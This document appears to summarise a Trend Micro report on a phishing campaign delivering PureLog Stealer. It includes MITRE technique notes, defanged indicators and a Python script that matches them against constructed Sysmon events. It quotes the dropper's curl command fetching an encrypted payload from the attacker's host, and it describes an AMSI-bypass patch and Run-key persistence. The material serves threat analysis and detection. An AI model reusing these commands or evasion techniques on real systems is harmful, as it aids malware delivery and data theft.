Copyright Lures Mask a Multi‑Stage PureLog Stealer Attack on Key Industries

A targeted, multi‑stage campaign delivers PureLog Stealer using localized phishing lures and an evasive, encrypted delivery chain that extracts and executes payloads entirely in memory. The attack employs fileless techniques including a Python loader, dual .NET loaders, AMSI bypass, remote key retrieval, and C2 exfiltration, impacting organizations running Windows in healthcare, government, hospitality, and education. #PureLogStealer #Windows

Keypoints

  • The campaign uses language‑matched copyright complaint lures (phishing) and malvertising to increase user execution success and target specific countries and industries.
  • A multi‑stage chain downloads an encrypted archive disguised as a PDF, retrieves a decryption password remotely, and uses a renamed WinRAR executable to extract payloads.
  • Execution is fileless: a renamed python.exe launches an obfuscated Python loader that performs AMSI bypass, loads encrypted .NET assemblies via in‑memory reflective loading, and never writes the final PureLog Stealer to disk.
  • Loaders include persistence via a Run registry key, full‑screen screenshot capture, victim fingerprinting (hostname, username, installed AV), and JSON exfiltration to HTTPS C2 endpoints.
  • Dual, ConfuserEx‑protected .NET loaders provide redundancy—each decrypts and loads a GZip-compressed .NET assembly (PureLog) into memory to evade static analysis and disk‑based detection.
  • Telemetry links activity to infrastructure including quickdocshare[.]com, multiple bestshoppingday domains, and C2 IPs such as 166[.]0[.]184[.]127; victims observed in Germany, Canada, the US, and Australia.

MITRE Techniques

  • [T1204] User Execution – The campaign relies on victims manually executing localized malicious lures disguised as legal notices to start the chain (‘Dokumentation über Verstöße gegen Rechte des geistigen Eigentums.exe’, translating to ‘Documentation on Intellectual Property Rights Violations.exe’)
  • [T1059.003] Command and Scripting Interpreter (Windows Command Shell) – The dropper invokes cmd.exe and runs curl and extraction commands to download and stage payloads (‘cmd.exe /c start "" "._document.pdf" && curl -A "curl/meow_meow" -s -k -L "https://quickdocshare.com/DQ" -o "._invoice.pdf"’)
  • [T1105] Ingress Tool Transfer – The encrypted payload is fetched from attacker infrastructure using curl to pull the mislabeled invoice.pdf (‘curl -A "curl/meow_meow" -s -k -L "https://quickdocshare.com/DQ" -o "._invoice.pdf"’)
  • [T1574.001] Hijack Execution Flow: DLL Side‑Loading – The campaign initiates execution via DLL sideloading as part of the dropper’s behavior (‘DLL sideloading to initiate execution’)
  • [T1218] Signed Binary Proxy Execution – Operators execute a renamed WinRAR binary masquerading as a PNG to extract the encrypted archive using a remotely retrieved password (‘_FILE_2025년_재직증명서_원본.png … This file is actually a renamed WinRAR executable.’)
  • [T1620] Reflective Code Loading – The Python loader bootstraps the CLR via COM calls and uses AppDomain.Load_3() to reflectively load an XOR/TripleDES‑decrypted .NET assembly entirely in memory (‘calls AppDomain.Load_3() to reflectively load and execute the payload’)
  • [T1562.001] Impair Defenses: Disable or Modify Tools – The loader implements a two‑stage AMSI bypass by patching AmsiScanBuffer so it always returns non‑malicious (‘patches the entry point of AmsiScanBuffer with a MOV EAX, E_INVALIDARG + JMP instruction so the function always returns "not malicious"’)
  • [T1547.001] Boot or Logon Autostart Execution: Registry Run Keys/Startup Folder – Persistence is achieved by creating a Run key entry named "SystemSettings" under the current user’s registry Run key (‘installs itself as a Windows autorun entry under the current user’s registry Run key. It uses "SystemSettings" as the value name’)
  • [T1113] Screen Capture – The loader captures a full‑resolution desktop screenshot via GDI, builds a PNG in memory, and encodes it for exfiltration (‘captures the entire desktop at full resolution… manually constructs a valid PNG file in memory’)
  • [T1082] System Information Discovery – Victim fingerprinting collects the hostname, username, and installed antivirus products via WMI for targeting and profiling (‘collects three pieces of victim identity data: the machine hostname, the logged-in username, and the names of all installed antivirus products’)
  • [T1055] Process Injection – Observed attempts to inject into or create remote threads in other processes, using svchost.exe as the target (‘Observed process injection attempt, leveraging svchost.exe as the target process.’)
  • [T1497] Virtualization/Sandbox Evasion – The loader includes anti‑virtual‑machine techniques to evade automated analysis environments (‘incorporates anti-virtual machine techniques to evade automated analysis environments.’)
  • [T1041] Exfiltration Over C2 Channel – Collected screenshots and fingerprints are assembled into JSON and sent to the C2 server over HTTPS POST (‘All collected data is assembled into a JSON object and sent to the C&C server over HTTPS.’)

Indicators of Compromise

  • [Domains] Download and C2 infrastructure – quickdocshare[.]com, cdn[.]eideasrl[.]it (and other bestshoppingday-style domains)
  • [IP Addresses] C2 and hosting – 166[.]0[.]184[.]127 (PureLog C2), 64[.]40[.]154[.]96 (observed outbound/Tier.Net)
  • [File Hashes] Malicious dropper and components – ZIP SHA256: 35efc4b75a1d70c38513b4dfe549da417aaa476bf7e9ebd00265aaa8c7295870 (malicious lure ZIP), ADNotificationManager.exe SHA256: 1539dab6099d860add8330bf2a008a4b6dc05c71f7b4439aebf431e034e5b6ff (malicious EXE); and 2 more hashes
  • [File Names] Staged and payload filenames – svchost.exe (renamed python.exe executed from C:\Users\Public\Windows), instructions.pdf (obfuscated Python loader/payload container)
  • [File Paths] Staging and persistence locations – C:\Users\Public\Windows\svchost.exe, extraction output to C:\Users\Public
  • [URLs] Download and key retrieval endpoints – hxxps://quickdocshare[.]com/DQ (encrypted payload), hxxps://quickdocshare[.]com/DQ/key (remote password retrieval)
  • [Registry Keys/Values] Persistence and state flags – Run key value "SystemSettings" under the current user’s Run key (persistence), CacheVersion DWORD=1337 under AppModelStateRepository (exfiltration state)
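The technique list and the indicators above translate directly into host-side detection logic. The following script is an added example written for this summary, not code from the Trend Micro report or from any detection product: it refangs the published indicators and runs them, together with the behavioural tells the report describes (an executable whose PE OriginalFileName differs from its on-disk name, an .exe launched from C:\Users\Public, the curl user-agent, the "SystemSettings" Run value, the CacheVersion=1337 flag, and connections to the listed infrastructure), over a handful of constructed Sysmon-style events. The event dictionaries, process IDs, SID, and the full registry path under which CacheVersion is assumed to live are all made up for the example; only the indicator values come from the report.

```python
import re

# Indicators copied from the report, in the defanged form it publishes them.
DEFANGED_DOMAINS = ("quickdocshare[.]com", "cdn[.]eideasrl[.]it")
DEFANGED_IPS = ("166[.]0[.]184[.]127", "64[.]40[.]154[.]96")
CURL_USER_AGENT = "curl/meow_meow"
RUN_VALUE_NAME = "SystemSettings"
STATE_FLAG_KEY, STATE_FLAG_VALUE = "AppModelStateRepository", 1337
PUBLIC_STAGING = "c:\\users\\public\\"
DWORD_RE = re.compile(r"DWORD \(0x([0-9a-fA-F]{8})\)")  # Sysmon 'Details' format


def refang(ioc: str) -> str:
    """Undo the [.] / hxxp defanging so an indicator can be matched literally."""
    return (ioc.replace("[.]", ".")
               .replace("hxxps://", "https://")
               .replace("hxxp://", "http://"))


DOMAINS = {refang(d) for d in DEFANGED_DOMAINS}
IPS = {refang(i) for i in DEFANGED_IPS}


def check_process(ev: dict) -> list[str]:
    """Sysmon event 1 (process create): renamed binaries, staging path, curl fetch."""
    hits = []
    image = ev.get("Image", "")
    base = image.rsplit("\\", 1)[-1].lower()
    original = ev.get("OriginalFileName", "").lower()
    # OriginalFileName is read from the PE version resource, so python.exe or
    # WinRAR.exe renamed on disk still reports its real name here.
    if original and original != base:
        hits.append(f"renamed binary: {base} is really {original}")
    if image.lower().startswith(PUBLIC_STAGING) and base.endswith(".exe"):
        hits.append(f"executable run from public staging dir: {image}")
    cmd = ev.get("CommandLine", "").lower()
    if CURL_USER_AGENT in cmd:
        hits.append("curl user-agent from the report in command line")
    hits += [f"download domain in command line: {d}" for d in DOMAINS if d in cmd]
    return hits


def check_registry(ev: dict) -> list[str]:
    """Sysmon event 13 (registry value set): Run-key persistence and the state flag."""
    hits = []
    target = ev.get("TargetObject", "")
    parts = target.split("\\")
    if len(parts) >= 2 and parts[-2].lower() == "run" and parts[-1] == RUN_VALUE_NAME:
        hits.append(f"Run-key persistence value {RUN_VALUE_NAME!r}: {ev.get('Details', '')}")
    if STATE_FLAG_KEY in target and parts[-1] == "CacheVersion":
        m = DWORD_RE.search(ev.get("Details", ""))
        if m and int(m.group(1), 16) == STATE_FLAG_VALUE:
            hits.append("CacheVersion=1337 exfiltration state flag")
    return hits


def check_network(ev: dict) -> list[str]:
    """Sysmon event 3 (network connect): known C2 / download infrastructure."""
    hits = []
    if ev.get("DestinationIp") in IPS:
        hits.append(f"connection to report C2/hosting IP {ev['DestinationIp']}")
    host = ev.get("DestinationHostname", "").lower()
    if host in DOMAINS:
        hits.append(f"connection to report domain {host}")
    return hits


CHECKS = {1: check_process, 13: check_registry, 3: check_network}


def scan(events: list[dict]) -> list[tuple]:
    """Return (EventID, ProcessId, hits) for every event that matched anything."""
    findings = []
    for ev in events:
        check = CHECKS.get(ev.get("EventID"))
        hits = check(ev) if check else []
        if hits:
            findings.append((ev["EventID"], ev.get("ProcessId"), hits))
    return findings


# Constructed sample telemetry modelled on the chain in the report (not real logs).
SID = r"HKU\S-1-5-21-1111-2222-3333-1001"  # made-up user SID
SAMPLE_EVENTS = [
    {"EventID": 1, "ProcessId": 4120, "Image": r"C:\Windows\System32\cmd.exe",
     "OriginalFileName": "Cmd.Exe",
     "CommandLine": 'cmd.exe /c start "" "._document.pdf" && curl -A "curl/meow_meow" '
                    '-s -k -L "https://quickdocshare.com/DQ" -o "._invoice.pdf"'},
    {"EventID": 1, "ProcessId": 4188, "Image": r"C:\Users\Public\Windows\svchost.exe",
     "OriginalFileName": "python.exe",
     "CommandLine": r'"C:\Users\Public\Windows\svchost.exe" instructions.pdf'},
    {"EventID": 13, "ProcessId": 4188,
     "TargetObject": SID + r"\Software\Microsoft\Windows\CurrentVersion\Run\SystemSettings",
     "Details": r"C:\Users\Public\Windows\svchost.exe"},
    {"EventID": 13, "ProcessId": 4188,  # key path below is assumed, not from the report
     "TargetObject": SID + r"\Software\Microsoft\Windows\CurrentVersion\AppModelStateRepository\CacheVersion",
     "Details": "DWORD (0x00000539)"},  # 0x539 == 1337
    {"EventID": 3, "ProcessId": 4188, "DestinationIp": "166.0.184.127", "DestinationHostname": ""},
    # Benign noise: the real svchost.exe and an unrelated connection.
    {"EventID": 1, "ProcessId": 5000, "Image": r"C:\Windows\System32\svchost.exe",
     "OriginalFileName": "svchost.exe", "CommandLine": "svchost.exe -k netsvcs"},
    {"EventID": 3, "ProcessId": 5000, "DestinationIp": "13.107.4.50", "DestinationHostname": "example.invalid"},
]

if __name__ == "__main__":
    for event_id, pid, hits in scan(SAMPLE_EVENTS):
        print(f"event {event_id} pid {pid}: " + "; ".join(hits))
```

The renamed-binary check is the most durable of these: the domain, IP and user-agent strings will rotate, but a python.exe or WinRAR.exe whose OriginalFileName does not match its on-disk name, running out of a world-writable public directory, is a tell that survives infrastructure changes.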


Read more: https://www.trendmicro.com/en_us/research/26/c/copyright-lures-mask-a-multistage-purelog-stealer-attack.html